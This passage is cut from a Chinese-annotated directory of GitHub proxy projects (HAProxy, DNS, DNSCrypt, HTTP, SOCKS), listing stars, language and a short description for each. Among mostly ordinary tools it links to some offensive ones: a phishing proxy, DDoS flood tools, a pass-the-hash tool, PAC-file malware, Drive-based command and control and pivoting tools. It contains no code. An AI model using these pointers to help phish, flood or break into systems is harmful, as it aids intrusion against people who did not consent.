โšกโšกโšกFast, Lightweight, Pluggable, TLS interception capable proxy server focused on Network monitoring, controls & Application development, testing, debugging - [**700**ๆ˜Ÿ][2m] [Go] [dliv3/venom](https://github.com/dliv3/venom) Venom - A Multi-hop Proxy for Penetration Testers - [**660**ๆ˜Ÿ][3y] [Ruby] [igrigorik/em-proxy](https://github.com/igrigorik/em-proxy) EventMachine Proxy DSL for writing high-performance transparent / intercepting proxies in Ruby - [**590**ๆ˜Ÿ][5d] [clarketm/proxy-list](https://github.com/clarketm/proxy-list) A list of free, public, forward proxy servers. UPDATED DAILY! - [**556**ๆ˜Ÿ][9y] [Ruby] [mojombo/proxymachine](https://github.com/mojombo/proxymachine) A simple TCP routing proxy built on EventMachine that lets you configure the routing logic in Ruby. - [**477**ๆ˜Ÿ][1y] [Go] [yinqiwen/gsnova](https://github.com/yinqiwen/gsnova) Private proxy solution & network troubleshooting tool. - [**429**ๆ˜Ÿ][3d] [Py] [stamparm/fetch-some-proxies](https://github.com/stamparm/fetch-some-proxies) Simple Python script for fetching "some" (usable) proxies - [**370**ๆ˜Ÿ][2m] [Py] [lyft/metadataproxy](https://github.com/lyft/metadataproxy) A proxy for AWS's metadata service that gives out scoped IAM credentials from STS - [**363**ๆ˜Ÿ][2y] [Py] [roglew/pappy-proxy](https://github.com/roglew/pappy-proxy) An intercepting proxy for web application testing - [**341**ๆ˜Ÿ][2y] [C++] [usb-tools/usbproxy-legacy](https://github.com/usb-tools/USBProxy-legacy) A proxy for USB devices, libUSB and gadgetFS - this project is unmaintained, try here: - [**305**ๆ˜Ÿ][3m] [JS] [bettercap/caplets](https://github.com/bettercap/caplets) ไฝฟ็”จ.cap่„šๆœฌ, ่‡ชๅŠจๅŒ–bettercap็š„ไบคไบ’ๅผไผš่ฏ - [**287**ๆ˜Ÿ][5m] [Go] [suyashkumar/ssl-proxy](https://github.com/suyashkumar/ssl-proxy) - [**285**ๆ˜Ÿ][2y] [evilsocket/bettercap-proxy-modules](https://github.com/evilsocket/bettercap-proxy-modules) This repository contains some bettercap transparent proxy example modules. - [**281**ๆ˜Ÿ][t] [a2u/free-proxy-list](https://github.com/a2u/free-proxy-list) - [**266**ๆ˜Ÿ][5y] [C] [mysql/mysql-proxy](https://github.com/mysql/mysql-proxy) MySQL Proxy is a simple program that sits between your client and MySQL server(s) and that can monitor, analyze or transform their communication. Its flexibility allows for a wide variety of uses, including load balancing, failover, query analysis, query filtering and modification, and many more. - [**229**ๆ˜Ÿ][4y] [Py] [danmcinerney/elite-proxy-finder](https://github.com/danmcinerney/elite-proxy-finder) Finds public elite anonymity proxies and concurrently tests them - [**218**ๆ˜Ÿ][9m] [Go] [joncooperworks/judas](https://github.com/joncooperworks/judas) a phishing proxy - [**218**ๆ˜Ÿ][1y] [PHP] [softius/php-cross-domain-proxy](https://github.com/softius/php-cross-domain-proxy) PHP Proxy for Cross Domain Requests - [**213**ๆ˜Ÿ][3y] [C#] [dxflatline/flatpipes](https://github.com/dxflatline/flatpipes) A TCP proxy over named pipes. Originally created for maintaining a meterpreter session over 445 for less network alarms. - [**207**ๆ˜Ÿ][2y] [Go] [netxfly/xsec-proxy-scanner](https://github.com/netxfly/xsec-proxy-scanner) ้€Ÿๅบฆ่ถ…ๅฟซใ€ๅฐๅทง็š„ไปฃ็†ๆœๅŠกๅ™จๆ‰ซๆๅ™จ - [**205**ๆ˜Ÿ][3y] [Go] [praetorian-code/trudy](https://github.com/praetorian-code/trudy) A transparent proxy that can modify and drop traffic for arbitrary TCP connections. - [**199**ๆ˜Ÿ][3m] [Py] [cisco-talos/decept](https://github.com/cisco-talos/decept) Decept Network Protocol Proxy - [**194**ๆ˜Ÿ][3y] [JS] [mhils/honeyproxy](https://github.com/mhils/honeyproxy) This project is now part of - [**186**ๆ˜Ÿ][13d] [Go] [asciimoo/morty](https://github.com/asciimoo/morty) ๅŽป้™คๆถๆ„HTMLๆ ‡็ญพๅ’Œๅฑžๆ€ง๏ผŒๅŽป้™คๅค–้ƒจ่ต„ๆบๅผ•็”จไปฅ้˜ฒๆญข็ฌฌไธ‰ๆ–นไฟกๆฏๆณ„้œฒ - [**185**ๆ˜Ÿ][2m] [Java] [sensepost/mallet](https://github.com/sensepost/mallet) Mallet is an intercepting proxy for arbitrary protocols - [**182**ๆ˜Ÿ][3m] [C] [cloudflare/mmproxy](https://github.com/cloudflare/mmproxy) mmproxy, the magical PROXY protocol gateway - [**172**ๆ˜Ÿ][2y] [Py] [mdsecactivebreach/chameleon](https://github.com/mdsecactivebreach/chameleon) A tool for evading Proxy categorisation - [**167**ๆ˜Ÿ][3y] [C] [hugsy/proxenet](https://github.com/hugsy/proxenet) The ONLY hacker friendly proxy for webapp pentests. - [**158**ๆ˜Ÿ][2y] [Py] [tintinweb/striptls](https://github.com/tintinweb/striptls) proxy poc implementation of STARTTLS stripping attacks - [**157**ๆ˜Ÿ][2m] [Py] [nucypher/pyumbral](https://github.com/nucypher/pyumbral) NuCypher's reference implementation of Umbral (threshold proxy re-encryption) using OpenSSL and Cryptography.io - [**154**ๆ˜Ÿ][4y] [C++] [hiwincn/htran](https://github.com/hiwincn/htran) HTran is a connection bouncer, a kind of proxy server. A โ€œlistenerโ€ program is hacked stealthily onto an unsuspecting host anywhere on the Internet. When it receives signals from the actual target system, it redirects it to the hackerโ€™s server. - [**143**ๆ˜Ÿ][2y] [Ruby] [nccgroup/binproxy](https://github.com/nccgroup/binproxy) BinProxy is a proxy for arbitrary TCP connections. You can define custom message formats using the BinData gem. - [**143**ๆ˜Ÿ][3y] [Py] [safebreach-labs/pacdoor](https://github.com/safebreach-labs/pacdoor) Proof-of-concept JavaScript malware implemented as a Proxy Auto-Configuration (PAC) File - [**135**ๆ˜Ÿ][9d] [C++] [pichi-router/pichi](https://github.com/pichi-router/pichi) Flexible Rule-Based Proxy - [**131**ๆ˜Ÿ][3y] [Py] [safebreach-labs/pyekaboo](https://github.com/safebreach-labs/pyekaboo) Proof-of-concept program that is able to to hijack/hook/proxy Python module(s) thanks to $PYTHONPATH variable - [**114**ๆ˜Ÿ][7m] [C#] [tyranid/canape.core](https://github.com/tyranid/canape.core) A network proxy library written in C# for .NET Core based on CANAPE - [**111**ๆ˜Ÿ][2m] [Py] [ickerwx/tcpproxy](https://github.com/ickerwx/tcpproxy) Intercepting TCP proxy to modify raw TCP streams using modules on incoming or outgoing traffic - [**110**ๆ˜Ÿ][6m] [Swift] [tuluobo/leiter](https://github.com/tuluobo/leiter) ไธ€ไธชๅŸบไบŽ NEKit ็š„็ฝ‘็ปœ Proxy Appใ€‚ - [**105**ๆ˜Ÿ][6m] [Py] [roglew/guppy-proxy](https://github.com/roglew/guppy-proxy) ็”จไบŽWebAppๅฎ‰ๅ…จๆต‹่ฏ•็š„ๆ‹ฆๆˆชไปฃ็†(intercepting proxy) - [**91**ๆ˜Ÿ][4y] [Py] [pdjstone/wsuspect-proxy](https://github.com/pdjstone/wsuspect-proxy) Python tool to inject fake updates into unencrypted WSUS traffic - [**90**ๆ˜Ÿ][3m] [C++] [leoloobeek/comproxy](https://github.com/leoloobeek/comproxy) PoC for proxying COM objects when hijacking - [**77**ๆ˜Ÿ][5m] [Go] [netxfly/x-proxy](https://github.com/netxfly/x-proxy) honeypot proxy - [**72**ๆ˜Ÿ][6y] [C] [jtripper/sslnuke](https://github.com/jtripper/sslnuke) Transparent proxy that decrypts SSL traffic and prints out IRC messages. - [**71**ๆ˜Ÿ][2y] [JS] [kureev/react-native-network-proxy](https://github.com/kureev/react-native-network-proxy) Network debugger (logger) for React Native apps - [**62**ๆ˜Ÿ][4m] [C] [sonertari/sslproxy](https://github.com/sonertari/sslproxy) Transparent SSL/TLS proxy for decrypting and diverting network traffic to other programs, such as UTM services, for deep SSL inspection - [**62**ๆ˜Ÿ][1m] [Lua] [yelp/casper](https://github.com/yelp/casper) Yelp's internal caching proxy, powered by Nginx and OpenResty at its core - [**60**ๆ˜Ÿ][8m] [JS] [try-to/electron-proxy](https://github.com/try-to/electron-proxy) ๅŸบไบŽelectronๅผ€ๅ‘็š„ๅ†…็ฝ‘็ฉฟ้€ๅทฅๅ…ท๏ผŒๆ”ฏๆŒๅคš็ณป็ปŸ๏ผŒๆ”ฏๆŒไปปๆ„ๆœฌๅœฐ็ซฏๅฃ. - [**58**ๆ˜Ÿ][3y] [nidom/buff](https://github.com/nidom/buff) A proxy tool for macOS. - [**58**ๆ˜Ÿ][7m] [JS] [pownjs/pown-proxy](https://github.com/pownjs/pown-proxy) Pown Proxy is a versatile web application security testing proxy with cool TUI features. - [**54**ๆ˜Ÿ][1y] [Go] [netflix-skunkworks/aws-metadata-proxy](https://github.com/netflix-skunkworks/aws-metadata-proxy) AWS Metadata Proxy for protection against SSRF - [**40**ๆ˜Ÿ][5m] [Java] [coveros/zap-sonar-plugin](https://github.com/coveros/zap-sonar-plugin) Integrates OWASP Zed Attack Proxy reports into SonarQube - [**27**ๆ˜Ÿ][17d] [C] [johndoe31415/ratched](https://github.com/johndoe31415/ratched) Ratched is a transparent Man-in-the-Middle TLS proxy intended for penetration testing - [**21**ๆ˜Ÿ][6y] [Go] [mikkolehtisalo/gssapi-proxy](https://github.com/mikkolehtisalo/gssapi-proxy) GSSAPI/Kerberos proxy - [**10**ๆ˜Ÿ][4m] [JS] [zaproxy/zap-api-nodejs](https://github.com/zaproxy/zap-api-nodejs) ### <a id="d3069cac6097830d12f5933c9c8b7a77"></a>HAProxy - [**1526**ๆ˜Ÿ][4d] [C] [jiangwenyuan/nuster](https://github.com/jiangwenyuan/nuster) A high performance HTTP proxy cache server and RESTful NoSQL cache server based on HAProxy - [**547**ๆ˜Ÿ][t] [Go] [jcmoraisjr/haproxy-ingress](https://github.com/jcmoraisjr/haproxy-ingress) HAProxy Ingress - [**492**ๆ˜Ÿ][1m] [Shell] [trimstray/multitor](https://github.com/trimstray/multitor) Shell่„šๆœฌ, ๅˆ›ๅปบๅคšไธชTorๅฎžไพ‹, ๅนถไฝฟ็”จHAProxyๅฎž็Žฐ่ดŸ่ฝฝๅ‡่กก - ้‡ๅคๅŒบๆฎต: [ๅŒฟๅ็ฝ‘็ปœ->ๅทฅๅ…ท->Tor](#e99ba5f3de02f68412b13ca718a0afb6) | - [**473**ๆ˜Ÿ][5d] [Py] [aidaho12/haproxy-wi](https://github.com/aidaho12/haproxy-wi) Web interface for managing Haproxy servers - [**279**ๆ˜Ÿ][5y] [Go] [hashicorp/consul-haproxy](https://github.com/hashicorp/consul-haproxy) Consul HAProxy connector for real-time configuration - [**221**ๆ˜Ÿ][3y] [Smarty] [analytically/haproxy-ddos](https://github.com/analytically/haproxy-ddos) DDOS and attack resilient HAProxy configuration. To be used behind CloudFlare. - [**179**ๆ˜Ÿ][3y] [Go] [adohe/kube2haproxy](https://github.com/adohe/kube2haproxy) High Availability HAProxy auto configuration and auto service discovery for Kubernetes. - [**161**ๆ˜Ÿ][10m] [Go] [armon/go-proxyproto](https://github.com/armon/go-proxyproto) Golang package to handle HAProxy Proxy Protocol - [**158**ๆ˜Ÿ][2y] [Shell] [anapsix/zabbix-haproxy](https://github.com/anapsix/zabbix-haproxy) HAProxy Zabbix Discovery and Template - [**121**ๆ˜Ÿ][2y] [Py] [teamhg-memex/aquarium](https://github.com/teamhg-memex/aquarium) Splash + HAProxy + Docker Compose - [**81**ๆ˜Ÿ][11d] [geerlingguy/ansible-role-haproxy](https://github.com/geerlingguy/ansible-role-haproxy) Ansible Role - HAProxy - [**67**ๆ˜Ÿ][14d] [Shell] [dbezemer/rpm-haproxy](https://github.com/dbezemer/rpm-haproxy) HAproxy RPM spec and builds for CentOS 6/7 - [**58**ๆ˜Ÿ][16d] [Java] [daggerok/streaming-file-server](https://github.com/daggerok/streaming-file-server) full-stack java file server with no limitation for files uploads and downloads: spring-boot + Gradle Kotlin DSL, Gradle buildSrc, postgres / h2, apache fileUpload, lombok, mustache, docker, jgiven, powermock, gradle, CI, bootstrap 4, bootstrap-filelinput, webjars, maven github-release-plugin, nginx, haproxy, reverse-proxy - [**36**ๆ˜Ÿ][3y] [C] [arodland/haproxy](https://github.com/arodland/haproxy) Experiment with haproxy - [**24**ๆ˜Ÿ][1m] [Py] [yelp/hacheck](https://github.com/yelp/hacheck) HAproxy healthcheck proxying service - [**20**ๆ˜Ÿ][27d] [HTML] [cloudfoundry-incubator/haproxy-boshrelease](https://github.com/cloudfoundry-incubator/haproxy-boshrelease) A BOSH release for haproxy (based on cf-release's haproxy job) - [**19**ๆ˜Ÿ][19d] [Py] [yelp/synapse-tools](https://github.com/yelp/synapse-tools) Tools for configuring synapse and reloading haproxy hitlessly ### <a id="6381920f17576b07cc87a8dc619123aa"></a>DNS #### <a id="b0328a85ce70f4be618511259df159a9"></a>ๆœชๅˆ†็ฑป - [**2503**ๆ˜Ÿ][8m] [C++] [chengr28/pcap_dnsproxy](https://github.com/chengr28/pcap_dnsproxy) Pcap_DNSProxy, a local DNS server based on packet capturing - [**342**ๆ˜Ÿ][9m] [Py] [iphelix/dnschef](https://github.com/iphelix/dnschef) DNS ไปฃ็†๏ผŒ็”จไบŽๆธ—้€ๆต‹่ฏ•ๅ’Œๆถๆ„ไปฃ็ ๅˆ†ๆž - [**237**ๆ˜Ÿ][12m] [Go] [fardog/secureoperator](https://github.com/fardog/secureoperator) A DNS-protocol proxy for DNS-over-HTTPS providers, such as Google and Cloudflare - [**203**ๆ˜Ÿ][1m] [Rust] [jedisct1/rust-doh](https://github.com/jedisct1/rust-doh) A fast and secure DoH (DNS-over-HTTP) server proxy written in Rust. - [**171**ๆ˜Ÿ][2y] [Go] [arwmq9b6/dnsproxy](https://github.com/arwmq9b6/dnsproxy) ้˜ฒ DNS ็ผ“ๅญ˜ๆฑกๆŸ“๏ผŒๅ…ผ้กพๆŸฅ่ฏข่ดจ้‡ไธŽ้€Ÿๅบฆ - [**79**ๆ˜Ÿ][2y] [Go] [netxfly/xsec-dns-proxy](https://github.com/netxfly/xsec-dns-proxy) xsec-dns-proxy๏ผšDNSไปฃ็†ๆœๅŠกๅ™จ๏ผŒๅฏไปฅๅฐ†DNS่ฏทๆฑ‚ไปฃ็†ๅˆฐๅŽ็ซฏ็š„DNSๆœๅŠกๅ™จไธญ๏ผŒๅœจไปฃ็†็š„่ฟ‡็จ‹ไธญไผšๅฐ†dns logๅ†™ๅ…ฅๅˆฐๆ•ฐๆฎๅบ“ไธญ - [**26**ๆ˜Ÿ][9m] [Py] [byt3bl33d3r/dnschef](https://github.com/byt3bl33d3r/dnschef) DNSChef - DNS proxy for Penetration Testers and Malware Analysts #### <a id="191c4ddd413ed659f507ef4ad8c17818"></a>DNSCrypt - [**5164**ๆ˜Ÿ][t] [Go] [dnscrypt/dnscrypt-proxy](https://github.com/DNSCrypt/dnscrypt-proxy) ็ตๆดป็š„DNSไปฃ็†๏ผŒๆ”ฏๆŒ็Žฐไปฃ็š„ๅŠ ๅฏ†DNSๅ่ฎฎ๏ผŒไพ‹ๅฆ‚๏ผšDNS protocols such as DNSCrypt v2, DNS-over-HTTPS and Anonymized DNSCrypt. - [**1433**ๆ˜Ÿ][1m] [C#] [bitbeans/simplednscrypt](https://github.com/bitbeans/simplednscrypt) A simple management tool for dnscrypt-proxy - [**951**ๆ˜Ÿ][7y] [C#] [opendns/dnscrypt-win-client](https://github.com/opendns/dnscrypt-win-client) Windows front end for DNSCrypt Proxy - [**461**ๆ˜Ÿ][9m] [C] [cofyc/dnscrypt-wrapper](https://github.com/cofyc/dnscrypt-wrapper) This is dnscrypt wrapper (server-side dnscrypt proxy), which helps to add dnscrypt support to any name resolver. - [**356**ๆ˜Ÿ][] [Shell] [dnscrypt/dnscrypt-server-docker](https://github.com/dnscrypt/dnscrypt-server-docker) A Docker image for a non-censoring, non-logging, DNSSEC-capable, DNSCrypt-enabled DNS resolver - [**327**ๆ˜Ÿ][4y] [JS] [pwnsdx/randomdns](https://github.com/pwnsdx/randomdns) improve the security, privacy and anonymity of DNSCrypt - [**315**ๆ˜Ÿ][t] [Py] [dnscrypt/dnscrypt-resolvers](https://github.com/dnscrypt/dnscrypt-resolvers) Lists of public DNSCrypt-enabled DNS resolvers - [**273**ๆ˜Ÿ][9d] [Go] [adguardteam/dnsproxy](https://github.com/adguardteam/dnsproxy) Simple DNS proxy with DoH, DoT, and DNSCrypt support - [**231**ๆ˜Ÿ][2y] [Shell] [simonclausen/dnscrypt-autoinstall](https://github.com/simonclausen/dnscrypt-autoinstall) Automatic installation and configuration of DNSCrypt (on Debian + Redhat like systems). This script will install DNSCrypt and configure it to start on boot and use an optional dnscrypt service. - [**162**ๆ˜Ÿ][4m] [C] [dyne/dnscrypt-proxy](https://github.com/dyne/dnscrypt-proxy) DNSCrypt-Proxy repository, frankly maintained for what it does (no new features planned) - [**94**ๆ˜Ÿ][1y] [Shell] [jedisct1/bitbar-dnscrypt-proxy-switcher](https://github.com/jedisct1/bitbar-dnscrypt-proxy-switcher) BitBar plugin to control dnscrypt-proxy usage - [**60**ๆ˜Ÿ][16d] [dnscrypt/dnscrypt-protocol](https://github.com/dnscrypt/dnscrypt-protocol) DNSCrypt protocol specification - [**57**ๆ˜Ÿ][2y] [oznu/docker-dns-ad-blocker](https://github.com/oznu/docker-dns-ad-blocker) A lightweight dnsmasq DNS server to block traffic to known ad servers with optional DNSCrypt support. Supports x86_64 and Raspberry Pi (armhf). - [**50**ๆ˜Ÿ][2y] [Shell] [jaybrown/dnscrypt-menu](https://github.com/jaybrown/dnscrypt-menu) Manage DNSCrypt from the macOS menu bar (BitBar plugin) - [**26**ๆ˜Ÿ][5d] [Vue] [dnscrypt/dnscrypt-website](https://github.com/dnscrypt/dnscrypt-website) DNSCrypt website - [**25**ๆ˜Ÿ][2y] [C] [dnscrypt/dnscrypt-plugin-geoip-block](https://github.com/dnscrypt/dnscrypt-plugin-geoip-block) Block DNS queries according to the country they resolve to - [**12**ๆ˜Ÿ][1y] [Py] [jmcgrath207/dnscryptproxypitool](https://github.com/jmcgrath207/dnscryptproxypitool) DnsCrypt Proxy 2 for PiHole Raspberry Pi 3 - [**10**ๆ˜Ÿ][12m] [alterstep/dnscrypt-osxclient](https://github.com/alterstep/dnscrypt-osxclient) Mac OSX application to control the DNSCrypt Proxy - [**1**ๆ˜Ÿ][2y] [Shell] [veerendra2/searx-with-dnscrypt](https://github.com/veerendra2/searx-with-dnscrypt) Searx metadata search engine meets dnscrypt in Docker ### <a id="b6f25145e99ea944cbb528a24afaa0be"></a>HTTP&&HTTPS - [**7969**ๆ˜Ÿ][4y] [Go] [cyfdecyf/cow](https://github.com/cyfdecyf/cow) HTTP proxy written in Go. COW can automatically identify blocked sites and use parent proxies to access. - [**6202**ๆ˜Ÿ][11d] [JS] [avwo/whistle](https://github.com/avwo/whistle) ๅŸบไบŽNodeๅฎž็Žฐ็š„่ทจๅนณๅฐๆŠ“ๅŒ…่ฐƒ่ฏ•ไปฃ็†ๅทฅๅ…ท๏ผˆHTTP, HTTP2, HTTPS, Websocket๏ผ‰ - [**1873**ๆ˜Ÿ][1m] [C] [tinyproxy/tinyproxy](https://github.com/tinyproxy/tinyproxy) a light-weight HTTP/HTTPS proxy daemon for POSIX operating systems - [**787**ๆ˜Ÿ][12d] [C#] [justcoding121/titanium-web-proxy](https://github.com/justcoding121/titanium-web-proxy) A cross-platform asynchronous HTTP(S) proxy server in C#. - [**514**ๆ˜Ÿ][11m] [Erlang] [heroku/vegur](https://github.com/heroku/vegur) HTTP Proxy Library - [**355**ๆ˜Ÿ][27d] [Go] [quay/jwtproxy](https://github.com/quay/jwtproxy) An HTTP-Proxy that adds AuthN through JWTs - [**231**ๆ˜Ÿ][2m] [Ruby] [zt2/sqli-hunter](https://github.com/zt2/sqli-hunter) SQLi-Hunter is a simple HTTP proxy server and a SQLMAP API wrapper that makes digging SQLi easy. - [**218**ๆ˜Ÿ][10m] [Go] [justmao945/mallory](https://github.com/justmao945/mallory) HTTP/HTTPS proxy over SSH - [**133**ๆ˜Ÿ][2y] [Py] [qiyeboy/baseproxy](https://github.com/qiyeboy/baseproxy) ๅผ‚ๆญฅhttp/httpsไปฃ็†,ๅฏๆ‹ฆๆˆชไฟฎๆ”นๆŠฅๆ–‡ - [**120**ๆ˜Ÿ][1y] [Go] [cllunsford/aws-signing-proxy](https://github.com/cllunsford/aws-signing-proxy) Golang http proxy to transparently sign requests to AWS endpoints - [**110**ๆ˜Ÿ][2y] [PHP] [walkor/php-http-proxy](https://github.com/walkor/php-http-proxy) HTTP proxy written in PHP based on workerman. - [**102**ๆ˜Ÿ][2y] [Go] [sakeven/httpproxy](https://github.com/sakeven/httpproxy) ๅŸบไบŽ Go ๅผ€ๅ‘๏ผŒๆ”ฏๆŒ http/1.1 ไปฅไธŠ็‰ˆๆœฌ็š„ HTTP(S) ไปฃ็†ใ€‚๏ผˆWhy not try out Mika?๏ผ‰ - [**32**ๆ˜Ÿ][3y] [Go] [mikegleasonjr/devproxy](https://github.com/mikegleasonjr/devproxy) A local development http proxy with hosts spoofing written in Go ### <a id="57b8e953d394bbed52df2a6976d98dfa"></a>Socks - [**3057**ๆ˜Ÿ][2m] [Go] [gwuhaolin/lightsocks](https://github.com/gwuhaolin/lightsocks) ่ฝป้‡็บง็ฝ‘็ปœๆททๆท†ไปฃ็†๏ผŒๅŸบไบŽ SOCKS5 ๅ่ฎฎ๏ผŒๅฏ็”จๆฅไปฃๆ›ฟ Shadowsocks - [**1943**ๆ˜Ÿ][5m] [C] [darkk/redsocks](https://github.com/darkk/redsocks) transparent TCP-to-proxy redirector - [**1740**ๆ˜Ÿ][10m] [Py] [constverum/proxybroker](https://github.com/constverum/proxybroker) Proxy [Finder | Checker | Server]. HTTP(S) & SOCKS - [**1532**ๆ˜Ÿ][3y] [Py] [sensepost/regeorg](https://github.com/sensepost/regeorg) The successor to reDuh, pwn a bastion webserver and create SOCKS proxies through the DMZ. Pivot and pwn. - [**939**ๆ˜Ÿ][2y] [C++] [securesocketfunneling/ssf](https://github.com/securesocketfunneling/ssf) ็ฝ‘็ปœๅทฅๅ…ทๅŒ…๏ผšTCP ๅ’Œ UDP ็ซฏๅฃ่ฝฌๅ‘ใ€SOCKS ไปฃ็†ใ€่ฟœ็จ‹ shell๏ผŒ่ทจๅนณๅฐ - [**852**ๆ˜Ÿ][3m] [Py] [anorov/pysocks](https://github.com/anorov/pysocks) A SOCKS proxy client and wrapper for Python. - [**794**ๆ˜Ÿ][3y] [Go] [armon/go-socks5](https://github.com/armon/go-socks5) SOCKS5 server in Golang - [**558**ๆ˜Ÿ][9m] [JS] [blinksocks/blinksocks](https://github.com/blinksocks/blinksocks) A framework for building composable proxy protocol stack. - [**469**ๆ˜Ÿ][6m] [Go] [dan-v/awslambdaproxy](https://github.com/dan-v/awslambdaproxy) An AWS Lambda powered HTTP/SOCKS web proxy - [**461**ๆ˜Ÿ][2y] [missdeer/avege](https://github.com/missdeer/avege) Yet Another Redsocks Golang Fork - [**441**ๆ˜Ÿ][3y] [Py] [ring04h/wyproxy](https://github.com/ring04h/wyproxy) proxying and recording HTTP/HTTPs/Socks5 proxy flow, save to MYSQL database. - [**425**ๆ˜Ÿ][3m] [PS] [p3nt4/invoke-socksproxy](https://github.com/p3nt4/invoke-socksproxy) Socks proxy server using powershell. Supports local and reverse connections for pivoting. - [**338**ๆ˜Ÿ][7m] [Py] [fbkcs/thunderdns](https://github.com/fbkcs/thunderdns) ไฝฟ็”จDNSๅ่ฎฎ่ฝฌๅ‘TCPๆต้‡. Python็ผ–ๅ†™, ๆ— ้œ€็ผ–่ฏ‘ๅฎขๆˆท็ซฏ, ๆ”ฏๆŒsocks5 - [**293**ๆ˜Ÿ][3y] [Py] [n1nj4sec/pr0cks](https://github.com/n1nj4sec/pr0cks) python script setting up a transparent proxy to forward all TCP and DNS traffic through a SOCKS / SOCKS5 or HTTP(CONNECT) proxy using iptables -j REDIRECT target - [**289**ๆ˜Ÿ][1y] [C] [dgoulet/torsocks](https://github.com/dgoulet/torsocks) Library to torify application - NOTE: upstream has been moved to - [**274**ๆ˜Ÿ][9m] [C] [rofl0r/microsocks](https://github.com/rofl0r/microsocks) tiny, portable SOCKS5 server with very moderate resource usage - [**265**ๆ˜Ÿ][4y] [JS] [mscdex/socksv5](https://github.com/mscdex/socksv5) SOCKS protocol version 5 server and client implementations for node.js - [**239**ๆ˜Ÿ][3m] [JS] [mattcg/socks5-http-client](https://github.com/mattcg/socks5-http-client) SOCKS v5 HTTP client implementation in JavaScript for Node.js. - [**239**ๆ˜Ÿ][9m] [C] [zhuhaow/tun2socks](https://github.com/zhuhaow/tun2socks) A tun2socks framework with Swift wrapper - [**233**ๆ˜Ÿ][3y] [C#] [thrdev/socks5](https://github.com/thrdev/socks5) A full-fledged high-performance socks5 proxy server written in C#. Plugin support included. - [**221**ๆ˜Ÿ][2y] [Go] [gamexg/proxyclient](https://github.com/gamexg/proxyclient) golang ไปฃ็†ๅบ“๏ผŒๅ’Œnetไธ€่‡ด็š„APIใ€‚ๆ”ฏๆŒ socks4ใ€socks4aใ€socks5ใ€httpใ€https ็ญ‰ไปฃ็†ๅ่ฎฎใ€‚ - [**209**ๆ˜Ÿ][3y] [Go] [yinghuocho/gotun2socks](https://github.com/yinghuocho/gotun2socks) A Golang implementation of tun2socks - [**206**ๆ˜Ÿ][2y] [Py] [linw1995/lightsocks-python](https://github.com/linw1995/lightsocks-python) - [**185**ๆ˜Ÿ][3y] [Go] [eahydra/socks](https://github.com/eahydra/socks) socks -- a proxy server. - [**185**ๆ˜Ÿ][3m] [JS] [oyyd/http-proxy-to-socks](https://github.com/oyyd/http-proxy-to-socks) hpts(http-proxy-to-socks) is a nodejs client to convert socks proxy into http proxy - [**184**ๆ˜Ÿ][2y] [5loyd/xsocks](https://github.com/5loyd/xsocks) This project closed. - [**174**ๆ˜Ÿ][2y] [Java] [fengyouchao/sockslib](https://github.com/fengyouchao/sockslib) A Java library of SOCKS5 protocol including client and server - [**154**ๆ˜Ÿ][6y] [C] [defuse/sockstress](https://github.com/defuse/sockstress) Sockstress (TCP DoS) implementation. - [**154**ๆ˜Ÿ][2m] [Rust] [net-reflow/reflow](https://github.com/net-reflow/reflow) Content-routable socks5 proxy switcher for your entire LAN. - [**137**ๆ˜Ÿ][9m] [Go] [snail007/shadowtunnel](https://github.com/snail007/shadowtunnel) secure tunnel which help you protecting your tcp traffic between your machine and your service on remote. - [**134**ๆ˜Ÿ][1m] [Go] [fanpei91/gap-proxy](https://github.com/fanpei91/gap-proxy) gap-proxy ๆ˜ฏไธ€ไธชๅŠ ้€Ÿ็ฝ‘็ปœ็š„ SOCKS5 ๅฎ‰ๅ…จไปฃ็†ๅทฅๅ…ทใ€‚ - [**134**ๆ˜Ÿ][1m] [Py] [leeon123/cc-attack](https://github.com/leeon123/cc-attack) Using Socks4/5 proxy to make a multithread Http-flood/Https-flood (cc) attack. - [**131**ๆ˜Ÿ][2y] [JS] [oyyd/encryptsocks](https://github.com/oyyd/encryptsocks) Encrypt your socks transmission. - [**120**ๆ˜Ÿ][2y] [PHP] [walkor/php-socks5](https://github.com/walkor/php-socks5) socks5 proxy written in PHP based on workerman. - [**105**ๆ˜Ÿ][15d] [Dockerfile] [peterdavehello/tor-socks-proxy](https://github.com/peterdavehello/tor-socks-proxy) - [**98**ๆ˜Ÿ][1y] [Py] [tonyseek/rsocks](https://github.com/tonyseek/rsocks) A SOCKS 4/5 reverse proxy server - [**95**ๆ˜Ÿ][4m] [Go] [grepplabs/kafka-proxy](https://github.com/grepplabs/kafka-proxy) Proxy connections to Kafka cluster. Connect through SOCKS Proxy, HTTP Proxy or to cluster running in Kubernetes. - [**93**ๆ˜Ÿ][2m] [C#] [mihazupan/httptosocks5proxy](https://github.com/mihazupan/httptosocks5proxy) C# Http to Socks5 proxy implementation - [**91**ๆ˜Ÿ][2y] [C++] [liulilittle/paperairplane](https://github.com/liulilittle/paperairplane) ไธ€ไธช็ฑปไผผไบŽProxifier็š„SOCKS5ไปฃ็†ๅทฅๅ…ท - [**80**ๆ˜Ÿ][1y] [Go] [lzjluzijie/websocks](https://github.com/lzjluzijie/websocks) A secure proxy based on WebSocket. ไธ€ไธชๅŸบไบŽ WebSocket ็š„ไปฃ็†ๅทฅๅ…ท - [**79**ๆ˜Ÿ][3y] [Go] [ring04h/s5.go](https://github.com/ring04h/s5.go) Socks5 proxy server by golang - [**72**ๆ˜Ÿ][2y] [JS] [chrisyer/lightsocks-nodejs](https://github.com/chrisyer/lightsocks-nodejs) It's a simple socks5 proxy tool which based on lightsocks - [**72**ๆ˜Ÿ][2y] [Go] [qax-a-team/ntlmsocks](https://github.com/QAX-A-Team/NtlmSocks) a pass-the-hash tool - [**66**ๆ˜Ÿ][1y] [Py] [lukebaggett/google_socks](https://github.com/lukebaggett/google_socks) A proof of concept demonstrating the use of Google Drive for command and control. - [**60**ๆ˜Ÿ][4y] [shadowsocks/tun2socks-ios](https://github.com/shadowsocks/tun2socks-ios) tun2socks as a library for iOS apps - [**56**ๆ˜Ÿ][3m] [Shell] [snail007/goproxy-heroku](https://github.com/snail007/goproxy-heroku) goproxy heroku ไธ€้”ฎ้ƒจ็ฝฒๅฅ—่ฃ…๏ผŒๆŠŠherokuๅ˜ไธบๅ…่ดน็š„http(s)\socks5ไปฃ็†๏ผŒๆœ็ดขๅญฆไน ่ต„ๆ–™ใ€‚ - [**56**ๆ˜Ÿ][3m] [C] [heiher/hev-socks5-tproxy](https://github.com/heiher/hev-socks5-tproxy) A simple, lightweight socks5 transparent proxy for Linux - [**52**ๆ˜Ÿ][6d] [Rust] [sorz/moproxy](https://github.com/sorz/moproxy) A transparent TCP to SOCKSv5/HTTP proxy on Linux written in Rust. - 